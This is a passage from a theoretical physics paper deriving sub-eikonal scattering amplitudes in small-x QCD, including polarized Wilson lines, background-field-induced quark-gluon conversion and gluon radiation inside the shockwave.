Their expressions are \[V_{\mathbf{x}}^{\text{q[1]}}(p^{+})= -g^{2}\frac{1}{2p^{+}}\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0 }^{+}}^{w_{2}^{+}}dw_{1}^{+}V_{\mathbf{x}}(x^{+},w_{2}^{+})t^{e^{\prime}}\psi_ {B}^{\beta}(w_{2}^{+},\mathbf{x})\left[\frac{\gamma^{-}\gamma^{5}}{2}\right]^{ \alpha\beta}\] \[\qquad\times U_{\mathbf{x}}^{e^{\prime}e}(w_{2}^{+},w_{1}^{+}) \bar{\psi}_{B}^{\alpha}(w_{1}^{+},\mathbf{x})t^{e}V_{\mathbf{x}}(w_{1}^{+},x_ {0}^{+}), \tag{3.8}\] \[V_{\mathbf{x}}^{\text{G[1]}}(p^{+})= -ig\frac{1}{2p^{+}}\int_{x_{0}^{+}}^{x^{+}}dw^{+}\,V_{\mathbf{x}} (x^{+},w^{+})f_{12}(w^{+},\mathbf{x})V_{\mathbf{x}}(w^{+},x_{0}^{+}).\] The polarized Wilson lines of type-two \(V_{\mathbf{x^{\prime}},\mathbf{x}}^{\text{pol[2]}}(p^{+})\) can also be decomposed into \(V_{\mathbf{x^{\prime}},\mathbf{x}}^{\text{pol[2]}}(p^{+})=\delta(\mathbf{x}- \mathbf{x}^{\prime})V_{\mathbf{x}}^{\text{q[2]}}(p^{+})+V_{\mathbf{x^{\prime} },\mathbf{x}}^{\text{G[2]}}(p^{+})\). Their explicit expressions are \[V_{\mathbf{x}}^{\text{q[2]}}(p^{+})= -\frac{g^{2}}{2p^{+}}\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0 }^{+}}^{w_{2}^{+}}dw_{1}^{+}V_{\mathbf{x}}(x^{+},w_{2}^{+})t^{e^{\prime}}\psi_ {B}^{\beta}(w_{2}^{+},\mathbf{x})\left[\frac{\gamma^{-}}{2}\right]^{\alpha\beta}\] \[\qquad\times U_{\mathbf{x}}^{e^{\prime}e}(w_{2}^{+},w_{1}^{+}) \bar{\psi}_{B}^{\alpha}(w_{1}^{+},\mathbf{x})t^{e}V_{\mathbf{x}}(w_{1}^{+},x_ {0}^{+}).\] \[V_{\mathbf{x^{\prime}},\mathbf{x}}^{\text{G[2]}}(p^{+})= i\frac{1}{2p^{+}}\int_{x_{0}^{+}}^{x^{+}}dw^{+}\,V_{\mathbf{x^{ \prime}}}^{m^{\prime}n^{\prime}}(x^{+},w^{+})\int_{\mathbf{z}}\delta(\mathbf{x ^{\prime}}-\mathbf{z})\Big{[}\overleftarrow{\mathcal{D}}_{l}\overrightarrow{ \mathcal{D}}^{l}(w^{+},\mathbf{z})\Big{]}_{n^{\prime}n}\,\delta(\mathbf{x}- \mathbf{z})V_{\mathbf{x}}^{nm}(w^{+},x_{0}^{+}). \tag{3.9}\] Eqs. (3.8) and (3.9) reproduce the polarized Wilson lines obtained in [12]. When the background fields are turned off by setting \(\psi_{B}=0,a_{i}=a^{-}=0\), the single quark scattering amplitude as given in eq. (3.7) does not vanish because of nonvanishing \(V_{\mathbf{x^{\prime}},\mathbf{x}}^{\text{G[2]}}\). \[V_{\mathbf{x^{\prime}},\mathbf{x}}^{\text{G[2]}}(p^{+})=i\frac{-\partial_{ \mathbf{x}}^{2}}{2p^{+}}\delta(\mathbf{x}-\mathbf{x^{\prime}})\left[x^{+}-x_ {0}^{+}\right]. \tag{3.10}\] It comes from the sub-eikonal order correction of free quark propagator \[\int_{-\infty}^{\infty}\frac{dp^{-}}{2\pi}e^{ip^{-}(x^{+}-x_{0}^{+})}\frac{i}{ 2p^{+}p^{-}-\mathbf{p}^{2}+i\epsilon}=\frac{1}{2p^{+}}e^{i\frac{\mathbf{p}^{2} }{2p^{+}}(x^{+}-x_{0}^{+})}. \tag{3.11}\] Expanding the phase factor to linear order, one gets eq. (3.10). When computing cross section by squaring scattering amplitudes, these vacuum contributions should be subtracted. The lesson is that there are two sources of sub-eikonal physics. One is dynamical, genuinely related to the interactions with background fields at the sub-eikonal order. The other is kinematic, which is just the sub-eikonal order expansion of the free propagator phase, having nothing to do with the background fields. In principle, one should replace \(\overleftarrow{\mathcal{D}}_{l}\overrightarrow{\mathcal{D}}^{l}\) by \((\overleftarrow{\mathcal{D}}_{l}\overrightarrow{\mathcal{D}}^{l}- \overleftarrow{\partial}_{l}\overrightarrow{\partial}^{l})\) for the interaction terms in eq. (2.38). 
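To make the kinematic origin of eq. (3.10) fully explicit (this is simply the linear expansion already described above, spelled out in one line),
\[e^{i\frac{\mathbf{p}^{2}}{2p^{+}}(x^{+}-x_{0}^{+})}\simeq 1+i\frac{\mathbf{p}^{2}}{2p^{+}}(x^{+}-x_{0}^{+}),\]
and the linear term, with \(\mathbf{p}^{2}\to-\partial_{\mathbf{x}}^{2}\) in transverse coordinate space, reproduces the vacuum piece in eq. (3.10); the subtraction of \(\overleftarrow{\partial}_{l}\overrightarrow{\partial}^{l}\) would remove this piece from the interaction term by hand.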
However, retaining the covariant derivatives \(\overleftarrow{\mathcal{D}}_{l}\overrightarrow{\mathcal{D}}^{l}\) automatically keeps track of the sub-eikonal contributions from the free propagators. In appendix C, it is shown that the \(\overleftarrow{\partial}_{l}\overrightarrow{\partial}^{l}\) term can be equivalently reproduced by the sub-eikonal order contributions to the Wilson line operator transformation due to the change to the interaction picture. As a result, one can keep the \(\overleftarrow{\mathcal{D}}_{l}\overrightarrow{\mathcal{D}}^{l}\) term as the sub-eikonal interaction and only use the eikonal order Wilson line operator transformation. For the single antiquark scattering amplitude, one can repeat the above calculations or apply a charge conjugation transformation to eq. (10). The fundamental representation color matrix changes as \(t^{e}\to-t^{e*}\), so that the Wilson lines in the fundamental representation change as \(V_{m^{\prime}m}\to V_{mm^{\prime}}^{\dagger}\). Under the charge conjugation transformation, the Dirac bilinear terms change as \[\begin{split}&\bar{\psi}(x)\gamma^{-}\psi(y)\longrightarrow-\bar{\psi}(y)\gamma^{-}\psi(x),\\ &\bar{\psi}(x)\gamma^{-}\gamma^{5}\psi(y)\longrightarrow\bar{\psi}(y)\gamma^{-}\gamma^{5}\psi(x).\end{split} \tag{28}\]

### Single gluon scattering amplitude

For the single gluon scattering amplitude up to sub-eikonal order, one can perform calculations similar to those in the previous subsection, starting from eq. (21). We only present the final result here. \[\begin{split}& M^{g\to g}(\{k^{\prime+},\mathbf{x}^{\prime},c^{\prime},\lambda^{\prime}\};\{k^{+},\mathbf{x},c,\lambda\})\\ =&(2\pi)2k^{+}\delta(k^{+}-k^{\prime+})\delta_{\lambda\lambda^{\prime}}\Big{[}\delta(\mathbf{x}-\mathbf{x}^{\prime})U_{\mathbf{x}}+\xi\delta(\mathbf{x}-\mathbf{x}^{\prime})\lambda U_{\mathbf{x}}^{\text{pol}[1]}(k^{+})+\xi U_{\mathbf{x}^{\prime},\mathbf{x}}^{\text{pol}[2]}(k^{+})\Big{]}^{c^{\prime}c}\end{split} \tag{29}\] Again the polarized Wilson lines can be further decomposed as \[\begin{split}& U_{\mathbf{x}}^{\text{pol}[1]}(k^{+})=U_{\mathbf{x}}^{\text{q}[1]}(k^{+})+U_{\mathbf{x}}^{\text{G}[1]}(k^{+}),\\ & U_{\mathbf{x}^{\prime},\mathbf{x}}^{\text{pol}[2]}(k^{+})=\delta(\mathbf{x}-\mathbf{x}^{\prime})U_{\mathbf{x}}^{\text{q}[2]}(k^{+})+U_{\mathbf{x}^{\prime},\mathbf{x}}^{\text{G}[2]}(k^{+}).\end{split} \tag{30}\] Their explicit expressions are.
\[\begin{split} U_{\mathbf{x}}^{\text{q}[1]}(k^{+})=&- \frac{g^{2}}{2k^{+}}\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+}}^{w_{2}^ {+}}dw_{1}^{+}{U_{\mathbf{x}}^{\prime}}^{h^{\prime}}(x^{+},w_{2}^{+})\bar{ \psi}_{B}(w_{2}^{+},\mathbf{x})t^{h^{\prime}}V_{\mathbf{x}}(w_{2}^{+},w_{1}^{ +})t^{h}\\ &\times\left[\frac{\gamma^{-}\gamma^{5}}{2}\right]\psi_{B}(w_{1}^ {+},\mathbf{x})U_{\mathbf{x}}^{hc}(w_{1}^{+},x_{0}^{+})+c.c.\\ \end{split} \tag{31}\] \[\begin{split} U_{\mathbf{x}}^{\text{G}[1]}(k^{+})=& -\frac{2ig}{2k^{+}}\int_{x_{0}^{+}}^{x^{+}}dw^{+}{U_{\mathbf{x}}^{c^{\prime}a }}(x^{+},w^{+})[f_{12}(w^{+},\mathbf{x})]^{ab}U_{\mathbf{x}}^{bc}(w^{+},x_{0}^ {+}).\\ \end{split}\] (32) \[\begin{split} U_{\mathbf{x}}^{\text{q}[2]}(k^{+})=& -\frac{g^{2}}{2k^{+}}\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+}}^{w_{2}^ {+}}dw_{1}^{+}{U_{\mathbf{x}}^{c^{\prime}}}^{h^{\prime}}(x^{+},w_{2}^{+})\bar {\psi}_{B}(w_{2}^{+},\mathbf{x})t^{h^{\prime}}V_{\mathbf{x}}(w_{2}^{+},w_{1}^{ +})t^{h}\\ &\times\left[\frac{\gamma^{-}}{2}\right]\psi_{B}(w_{1}^{+}, \mathbf{x})U_{\mathbf{x}}^{hc}(w_{1}^{+},x_{0}^{+})+c.c.\\ \end{split}\] (33) \[\begin{split} U_{\mathbf{x}^{\prime},\mathbf{x}}^{\text{G}[2]}( k^{+})=&\frac{i}{2k^{+}}\int_{x_{0}^{+}}^{x^{+}}dw^{+}{U_{\mathbf{x}^{ \prime}}^{c^{\prime}a}}(x^{+},w^{+})\int_{\mathbf{z}}\delta(\mathbf{x}^{ \prime}-\mathbf{z})\Big{[}\overleftarrow{\mathcal{D}}_{l}\overrightarrow{ \mathcal{D}}^{l}(w^{+},\mathbf{z})\Big{]}^{ab}\delta(\mathbf{z}-\mathbf{x})U_{ \mathbf{x}}^{bc}(w^{+},x_{0}^{+}).\end{split} \tag{34}\] Note that "\(c.c.\)" represent the corresponding charge conjugation terms. ### Background field induced quark-gluon conversion When computing particle and jet productions in polarized collision, one has to consider background field induced quark-gluon converting processes like \(g\leftrightarrow q\) and \(g\leftrightarrow\bar{q}\), see Fig. 1. These subprocesses, representing order \(\xi^{\frac{1}{2}}\) contribution, can happen in pair flexibly in the scattering amplitude and the complex conjugate amplitude to make the final cross section be at order \(\xi\). This flexibility typically increases the number of Feynman diagrams and introduces delicate cancellation among certain set of diagrams. This flexibility might also induce extra contributions to small \(x\) rapidity evolution [20]. The background field induced quark-gluon conversion responsible for quark-gluon dijet production in deep inelastic electron-proton scatterings was recently investigated in [28]. For future reference, we present the explicit expressions for these subprocesses in this section. For gluon to quark conversion, substituting the interaction \(V_{(\frac{1}{2})}\) from eq. 
(37), one obtains \[\begin{split}& M^{g\to q}(\{p^{+},{\bf x},c,\lambda\},\{p^{\prime+},{\bf z},m,\sigma\})\\ =&\langle 0|\hat{b}_{m,\sigma}(p^{\prime+},{\bf z})\hat{S}(x^{+},x_{0}^{+})\hat{a}^{\dagger}_{c,\lambda}(p^{+},{\bf x})|0\rangle\\ =&-i\int_{x_{0}^{+}}^{x^{+}}dw^{+}\langle 0|\hat{b}_{m,\sigma}(p^{\prime+},{\bf z})\hat{W}(x^{+},w^{+})\hat{V}_{(1/2)}(w^{+})\hat{W}(w^{+},x_{0}^{+})\hat{a}^{\dagger}_{c,\lambda}(p^{+},{\bf x})|0\rangle\\ =&-i\int_{x_{0}^{+}}^{x^{+}}dw^{+}V^{mm^{\prime}}_{\bf z}(x^{+},w^{+})\langle 0|\hat{b}_{m^{\prime},\sigma}(p^{\prime+},{\bf z})\hat{V}_{(1/2)}(w^{+})\hat{a}^{\dagger}_{c^{\prime},\lambda}(p^{+},{\bf x})|0\rangle{U^{c^{\prime}c}_{\bf x}}(w^{+},x_{0}^{+})\\ =&-i\int_{x_{0}^{+}}^{x^{+}}dw^{+}V^{mm^{\prime}}_{\bf z}(x^{+},w^{+})\langle 0|\hat{b}_{m^{\prime},\sigma}(p^{\prime+},{\bf z})\Big{[}g\int_{{\bf y},q^{+}}\frac{1}{2q^{+}}\hat{b}^{\dagger}_{n,\rho}(q^{+},{\bf x})\bar{u}_{G,\rho}(q^{+})\hat{a}_{e,\kappa}(q^{+},{\bf y})\\ &\qquad\times\varepsilon^{i}_{\kappa}\gamma_{i}t^{e}_{nn^{\prime}}\psi_{B,n^{\prime}}(w^{+},{\bf y})\Big{]}\hat{a}^{\dagger}_{c^{\prime},\lambda}(p^{+},{\bf x})|0\rangle{U^{c^{\prime}c}_{\bf x}}(w^{+},x_{0}^{+})\\ =&(2\pi)2p^{+}\delta(p^{+}-p^{\prime+})\delta({\bf x}-{\bf z}){\cal M}^{g\to q}(x^{+},x_{0}^{+};p^{+},{\bf x},\{c,\lambda\},\{m,\sigma\})\end{split} \tag{37}\] The gluon-quark conversion process preserves the longitudinal momentum and the transverse coordinates. It only changes the color and spin quantum numbers. After factorizing out the Dirac delta functions, the conversion amplitude is \[\begin{split}&{\cal M}^{g\to q}(x^{+},x_{0}^{+};p^{+},{\bf x},\{c,\lambda\},\{m,\sigma\})\\ =&-ig\int_{x_{0}^{+}}^{x^{+}}dw^{+}\,V^{mm^{\prime}}_{\bf x}(x^{+},w^{+})\frac{1}{2p^{+}}\bar{u}_{G,\sigma}(p^{+})\varepsilon^{i}_{\lambda}\gamma_{i}t^{e}_{m^{\prime}n}\psi_{B,n}(w^{+},{\bf x})U^{ec}_{\bf x}(w^{+},x_{0}^{+}).\end{split} \tag{38}\] Repeating the above calculations, one obtains the amplitude for gluon to antiquark conversion, \[\begin{split}&{\cal M}^{g\to\bar{q}}(x^{+},x_{0}^{+};p^{+},{\bf x},\{c,\lambda\},\{m,\sigma\})\\ =&+ig\int_{x_{0}^{+}}^{x^{+}}dw^{+}V^{\dagger m^{\prime}m}_{\bf x}(x^{+},w^{+})\bar{\psi}_{B,n}(w^{+};{\bf x})\gamma_{i}\varepsilon^{i}_{\lambda}t^{e}_{nm^{\prime}}\frac{1}{2p^{+}}v_{G,\sigma}(p^{+})U^{ec}_{\bf x}(w^{+},x_{0}^{+}).\end{split} \tag{39}\] For quark to gluon conversion, the amplitude is \[\begin{split}&{\cal M}^{q\to g}(x^{+},x_{0}^{+};p^{+},{\bf x},\{m,\sigma\},\{c,\lambda\})\\ =&-ig\int_{x_{0}^{+}}^{x^{+}}dw^{+}U^{ec}_{\bf x}(x^{+},w^{+})\frac{1}{2p^{+}}\bar{\psi}_{B,n}(w^{+},{\bf x})\gamma_{i}t^{e}_{nm^{\prime}}\varepsilon^{i*}_{\lambda}u_{G,\sigma}(p^{+})V^{m^{\prime}m}_{\bf x}(w^{+},x_{0}^{+}).\end{split} \tag{40}\] For antiquark to gluon conversion, \[\begin{split}&\mathcal{M}^{\bar{q}\to g}(x^{+},x_{0}^{+};p^{+},\mathbf{x},\{m,\sigma\},\{c,\lambda\})\\ =&+ig\int_{x_{0}^{+}}^{x^{+}}dw^{+}U^{ce}_{\mathbf{x}}(x^{+},w^{+})\frac{1}{2p^{+}}\bar{v}_{G,\sigma}(p^{+})\varepsilon^{i\star}_{\lambda}\gamma_{i}t^{e}_{m^{\prime}n^{\prime}}\psi_{B,n^{\prime}}(w^{+};\mathbf{x})V^{\dagger mm^{\prime}}_{\mathbf{x}}(w^{+},x_{0}^{+}).\end{split} \tag{3.21}\] Again, this expression can be obtained by directly applying charge conjugation to eq. (3.20).

### Quark-antiquark pair converted to two gluons
Using the eikonality expansion of the \(S\)-matrix operator, eq. (2.21), one can also compute the sub-eikonal process in which a quark-antiquark pair is converted into two gluons, \(\langle gg|\hat{S}|q\bar{q}\rangle\); see Fig. 3. In principle, one can obtain the amplitude \(M^{q\bar{q}\to gg}\) as the product of the two amplitudes computed in eqs. (3.20) and (3.21) \[M^{q\bar{q}\to gg}=M^{q\to g}M^{\bar{q}\to g}. \tag{3.22}\] However, we would like to demonstrate that this process can be directly computed from the eikonality expansion of the \(S\)-matrix operator in eq. (2.21), thus providing further evidence of the validity of the expansion.

Figure 3: The process of \(q\bar{q}\to gg\) induced by background quark fields.

\[\begin{split}& M^{q\bar{q}\to gg}(\{k_{1}^{+},\mathbf{x}_{1},m_{1},\sigma_{1}\},\{k_{2}^{+},\mathbf{x}_{2},m_{2},\sigma_{2}\};\{p_{1}^{+},\mathbf{y}_{1},c_{1},\lambda_{1}\},\{p_{2}^{+},\mathbf{y}_{2},c_{2},\lambda_{2}\})\\ =&\langle 0|\hat{a}_{c_{1},\lambda_{1}}(p_{1}^{+},\mathbf{y}_{1})\hat{a}_{c_{2},\lambda_{2}}(p_{2}^{+},\mathbf{y}_{2})\,\hat{S}\,\hat{b}^{\dagger}_{m_{1},\sigma_{1}}(k_{1}^{+},\mathbf{x}_{1})\hat{d}^{\dagger}_{m_{2},\sigma_{2}}(k_{2}^{+},\mathbf{x}_{2})|0\rangle\\ =&-\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+}}^{w_{2}^{+}}dw_{1}^{+}\langle 0|\hat{a}_{c_{1},\lambda_{1}}(p_{1}^{+},\mathbf{y}_{1})\hat{a}_{c_{2},\lambda_{2}}(p_{2}^{+},\mathbf{y}_{2})\Big{[}\hat{W}(x^{+},w_{2}^{+})V_{(1/2)}(w_{2}^{+})\hat{W}(w_{2}^{+},w_{1}^{+})\\ &\qquad\times V_{(1/2)}(w_{1}^{+})\hat{W}(w_{1}^{+},x_{0}^{+})\Big{]}\hat{b}^{\dagger}_{m_{1},\sigma_{1}}(k_{1}^{+},\mathbf{x}_{1})\hat{d}^{\dagger}_{m_{2},\sigma_{2}}(k_{2}^{+},\mathbf{x}_{2})|0\rangle\\ =&-\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+}}^{w_{2}^{+}}dw_{1}^{+}U^{c_{1}h_{1}}_{\mathbf{y}_{1}}(x^{+},w_{2}^{+})U^{c_{2}h_{2}}_{\mathbf{y}_{2}}(x^{+},w_{2}^{+})\langle 0|\hat{a}_{h_{1},\lambda_{1}}(p_{1}^{+},\mathbf{y}_{1})\hat{a}_{h_{2},\lambda_{2}}(p_{2}^{+},\mathbf{y}_{2})\\ &\qquad\times\hat{V}_{(1/2)}(w_{2}^{+})\hat{W}(w_{2}^{+},w_{1}^{+})\hat{V}_{(1/2)}(w_{1}^{+})\hat{b}^{\dagger}_{n_{1},\sigma_{1}}(k_{1}^{+},\mathbf{x}_{1})\hat{d}^{\dagger}_{n_{2},\sigma_{2}}(k_{2}^{+},\mathbf{x}_{2})|0\rangle\\ &\qquad\times V^{n_{1}m_{1}}_{\mathbf{x}_{1}}(w_{1}^{+},x_{0}^{+})V^{\dagger m_{2}n_{2}}_{\mathbf{x}_{2}}(w_{1}^{+},x_{0}^{+}).\end{split} \tag{3.23}\] We have used the identities \(\hat{W}\hat{b}^{\dagger}_{j}\hat{W}^{\dagger}=\hat{b}^{\dagger}_{i}V_{ij}\), \(\hat{W}\hat{d}^{\dagger}_{i}\hat{W}^{\dagger}=V^{\dagger}_{ij}\hat{d}^{\dagger}_{j}\) and \(\hat{W}^{\dagger}\hat{a}_{c}\hat{W}=U^{ch}\hat{a}_{h}\), which are valid at the eikonal order. Among the terms in \(V_{(1/2)}(w_{1}^{+})\) and \(V_{(1/2)}(w_{2}^{+})\), there are only two combinations that give nonvanishing contributions. One combination is \[\hat{V}_{(1/2)}(w_{2}^{+})=g\int_{\mathbf{z}^{\prime}}\int_{p^{\prime+}}\frac{1}{2p^{\prime+}}\bar{\psi}_{B,l^{\prime}}(w_{2}^{+},\mathbf{z}^{\prime})\gamma_{i^{\prime}}t_{l^{\prime}j^{\prime}}^{e^{\prime}}\hat{a}_{e^{\prime},\lambda^{\prime}}^{\dagger}(p^{\prime+},\mathbf{z}^{\prime})\varepsilon_{\lambda^{\prime}}^{i^{\prime}*}\hat{b}_{j^{\prime},s^{\prime}}(p^{\prime+},\mathbf{z}^{\prime})u_{G,s^{\prime}}(p^{\prime+}) \tag{3.24}\] and \[\hat{V}_{(1/2)}(w_{1}^{+})=g\int_{\mathbf{z}}\int_{p^{+}}\frac{1}{2p^{+}}\hat{d}_{j,s}(p^{+},\mathbf{z})\bar{v}_{G,s}(p^{+})\hat{a}_{e,\lambda}^{\dagger}(p^{+},\mathbf{z})\varepsilon_{\lambda}^{i*}\gamma_{i}t_{jl}^{e}\psi_{B,l}(w_{1}^{+},\mathbf{z}).
\tag{3.25}\] The other combination is to switch the expressions by \(w_{1}^{+}\leftrightarrow w_{2}^{+}\). Using these expressions, eq. (3.23) can be expressed as \[\begin{split}&\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+}}^ {w_{2}^{+}}dw_{1}^{+}\left[(2\pi)2k_{1}^{+}\delta(k_{1}^{+}-p_{1}^{+})\delta( \mathbf{x}_{1}-\mathbf{y}_{1})(2\pi)2k_{2}^{+}\delta(k_{2}^{+}-p_{2}^{+}) \delta(\mathbf{x}_{2}-\mathbf{y}_{2})\right]\\ &\qquad\times g^{2}\frac{1}{2k_{1}^{+}}\frac{1}{2k_{2}^{+}}\bar{ \psi}_{B,l^{\prime}}(w_{2}^{+},\mathbf{x}_{1})t_{l^{\prime}n_{1}^{\prime}}^{h_ {1}}\gamma_{i^{\prime}}\varepsilon_{\lambda_{1}}^{i^{\prime}*}u_{G,\sigma_{1}} (k_{1}^{+})\bar{v}_{G,\sigma_{2}}(k_{2}^{+})\gamma_{i}\varepsilon_{\lambda_{2} }^{i*}t_{n2l}^{e}\psi_{B,l}(w_{1}^{+},\mathbf{x}_{2})\\ &\qquad\times U_{\mathbf{x}_{1}}^{c_{1}h_{1}}(x^{+},w_{2}^{+})V_{ \mathbf{x}_{1}}^{n_{1}^{\prime}m_{1}}(w_{2}^{+},x_{0}^{+})U_{\mathbf{x}_{2}}^ {c_{2}e}(x^{+},w_{1}^{+})V_{\mathbf{x}_{2}}^{\dagger m_{2}n_{2}}(w_{1}^{+},x_ {0}^{+})\\ &\qquad+(w_{1}^{+}\leftrightarrow w_{2}^{+}).\end{split} \tag{3.26}\] (The extra minus sign comes from moving the annihilation operator \(\hat{d}_{j,s}\) across \(\psi_{B,l}\).) Exchanging \(w_{1}^{+}\) and \(w_{2}^{+}\) is only for the integrand. It is equivalent to exchanging \(w_{1}^{+}\) and \(w_{2}^{+}\) in the integration measures while keeping the integrand unchanged. We will use \[\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+}}^{w_{2}^{+}}dw_{1}^{+}+\int_ {x_{0}^{+}}^{x^{+}}dw_{1}^{+}\int_{x_{0}^{+}}^{w_{1}^{+}}dw_{2}^{+}=\int_{x_{0 }^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+}}^{x^{+}}dw_{1}^{+}. \tag{3.27}\] The final result for the scattering amplitude is \[\begin{split}& M^{q\bar{q}\to gg}\\ =&\left[(2\pi)2k_{1}^{+}\delta(k_{1}^{+}-p_{2}^{+}) \delta(\mathbf{x}_{1}-\mathbf{y}_{2})(2\pi)2k_{2}^{+}\delta(k_{2}^{+}-p_{1}^{+ })\delta(\mathbf{x}_{2}-\mathbf{y}_{1})\right]\int_{x_{0}^{+}}^{x^{+}}dw_{2}^ {+}\int_{x_{0}^{+}}^{x^{+}}dw_{1}^{+}\\ &\times g^{2}\frac{1}{4\sqrt{k_{1}^{+}k_{2}^{+}}}\bar{\psi}_{B,l ^{\prime}}(w_{2}^{+},\mathbf{x}_{1})\left[t^{h}V_{\mathbf{x}_{1}}(w_{2}^{+},x_ {0}^{+})\right]_{l^{\prime}m_{1}}[\gamma^{-}+\lambda_{2}\gamma^{-}\gamma^{5}] \delta_{\lambda_{1},-\lambda_{2}}\\ &\qquad\times\left[V_{\mathbf{x}_{2}}^{\dagger}(w_{1}^{+},x_{0}^{+ })t^{e}\right]_{m_{2}l}\psi_{B,l}(w_{1}^{+},\mathbf{x}_{2})U_{\mathbf{x}_{1}}^ {c_{2}h}(x^{+},w_{2}^{+})U_{\mathbf{x}_{2}}^{c_{1}e}(x^{+},w_{1}^{+})\\ &+\left[(2\pi)2k_{1}^{+}\delta(k_{1}^{+}-p_{1}^{+})\delta( \mathbf{x}_{1}-\mathbf{y}_{1})(2\pi)2k_{2}^{+}\delta(k_{2}^{+}-p_{2}^{+}) \delta(\mathbf{x}_{2}-\mathbf{y}_{2})\right]\int_{x_{0}^{+}}^{x^{+}}dw_{2}^ {+}\int_{x_{0}^{+}}^{x^{+}}dw_{1}^{+}\\ &\times g^{2}\frac{1}{4\sqrt{k_{1}^{+}k_{2}^{+}}}\bar{\psi}_{B,l ^{\prime}}(w_{2}^{+},\mathbf{x}_{1})\left[t^{h}V_{\mathbf{x}_{1}}(w_{2}^{+},x_ {0}^{+})\right]_{l^{\prime}m_{1}}[\gamma^{-}+\lambda_{1}\gamma^{-}\gamma^{5}] \delta_{-\lambda_{1},\lambda_{2}}\\ &\qquad\times\left[V_{\mathbf{x}_{2}}^{\dagger}(w_{1}^{+},x_{0}^{+ })t^{e}\right]_{m_{2}l}\psi_{B,l}(w_{1}^{+},\mathbf{x}_{2})U_{\mathbf{x}_{1}}^ {c_{1}h}(x^{+},w_{2}^{+})U_{\mathbf{x}_{2}}^{c_{2}e}(x^{+},w_{1}^{+}).\end{split} \tag{3.28}\] This expression is exactly the same as \(M^{q\to g}M^{\bar{q}\to g}\) using eq. (3.20) and eq. (3.21). The spinor space matrix elements have been further simplified by requiring the quark antiquark spin states satisfy \(\delta_{\sigma_{1},-\sigma_{2}}\). This is generally true when the quark antiquark pair comes from a photon/gluon splitting. 
We have used the spinor space identity \[\begin{split}&\gamma_{i^{\prime}}\varepsilon_{\lambda_{2}}^{i^{\prime}*}u_{G,\sigma_{1}}(k_{1}^{+})\bar{v}_{G,\sigma_{2}}(k_{2}^{+})\gamma_{i}\varepsilon_{\lambda_{1}}^{i*}\delta_{\sigma_{1},-\sigma_{2}}\\ =&\sqrt{k_{1}^{+}k_{2}^{+}}[\gamma^{-}+\lambda_{2}\gamma^{-}\gamma^{5}]\delta_{\lambda_{1},-\lambda_{2}}\end{split} \tag{3.29}\] whose derivation can be found in appendix B. It is interesting to note that the polarizations of the two outgoing gluons are opposite.

## 4 Gluon Radiation Inside the Shockwave

The small \(x\) effective Hamiltonian derived in Sec. 2.3 predicts that gluon radiation inside the shockwave, induced by background gluon fields, contributes to physical processes at sub-eikonal order. In this section, we discuss two specific situations in which gluon radiation inside the shockwave contributes. One is the double-spin asymmetry for soft gluon production in longitudinally polarized collisions. The other is the small \(x\) rapidity evolution of the chromo-magnetically polarized Wilson line correlator. It is noted that gluon radiation inside the shockwave has been incorporated in studying gluon TMD evolution in [23; 24]. In the context of jet quenching in heavy-ion collisions, medium induced gluon radiation has also been studied in [29; 30].

### Longitudinal double-spin asymmetry for soft gluon production

For the incoming gluon we use \(c,\lambda,p^{+},\mathbf{p}\) to denote its color, polarization and momentum. For the two outgoing gluons, the color, polarization and momentum are \(c_{1},\lambda_{1},p_{1}^{+},\mathbf{p}_{1}\) and \(c_{2},\lambda_{2},p_{2}^{+},\mathbf{p}_{2}\), respectively. It is easier to do the calculations in the mixed representation, in which longitudinal momenta and transverse positions are used. We thus denote the corresponding transverse coordinates of the incoming and outgoing gluons as \(\mathbf{x}_{0},\mathbf{x}_{1},\mathbf{x}_{2}\). We focus on the situation in which one of the outgoing gluons is in the midrapidity region. The longitudinal momenta satisfy \(p_{1}^{+}\ll p_{2}^{+}\sim p^{+}\), or \(p_{1}^{+}=zp^{+}\) with \(z\to 0\). We calculate the first diagram in Fig. 4, representing the interference term between the eikonal order initial state gluon radiation and the sub-eikonal order gluon radiation inside the shockwave. The eikonal order gluon radiation amplitude is computed as \[\mathcal{M}_{2}= \delta(\mathbf{x}_{0}-\mathbf{x}_{2})(igf^{ce_{1}e_{2}})(2\delta_{\lambda\lambda_{2}}\varepsilon_{\lambda_{1}}^{j*})\frac{i}{2\pi}\frac{(\mathbf{x}_{1}-\mathbf{x}_{0})^{j}}{|\mathbf{x}_{1}-\mathbf{x}_{0}|^{2}}U_{\mathbf{x}_{1}}^{c_{1}e_{1}}U_{\mathbf{x}_{0}}^{c_{2}e_{2}}. \tag{4.1}\] For gluon radiation inside the shockwave, the amplitude is computed using the formula eq. (21).
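As an aside (a standard identity quoted only for orientation; the Fourier convention \(e^{+i\mathbf{p}\cdot\mathbf{r}}\) for the transverse transform is assumed here), the transverse kernel appearing in eq. (4.1) is simply the two-dimensional Fourier transform of the soft emission vertex \(\mathbf{p}^{j}/\mathbf{p}^{2}\),
\[\int\frac{d^{2}\mathbf{p}}{(2\pi)^{2}}\,e^{i\mathbf{p}\cdot(\mathbf{x}_{1}-\mathbf{x}_{0})}\,\frac{\mathbf{p}^{j}}{\mathbf{p}^{2}}=\frac{i}{2\pi}\frac{(\mathbf{x}_{1}-\mathbf{x}_{0})^{j}}{|\mathbf{x}_{1}-\mathbf{x}_{0}|^{2}},\]
i.e., the familiar Weizsäcker-Williams field of the parent gluon at \(\mathbf{x}_{0}\) evaluated at the emission point \(\mathbf{x}_{1}\).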
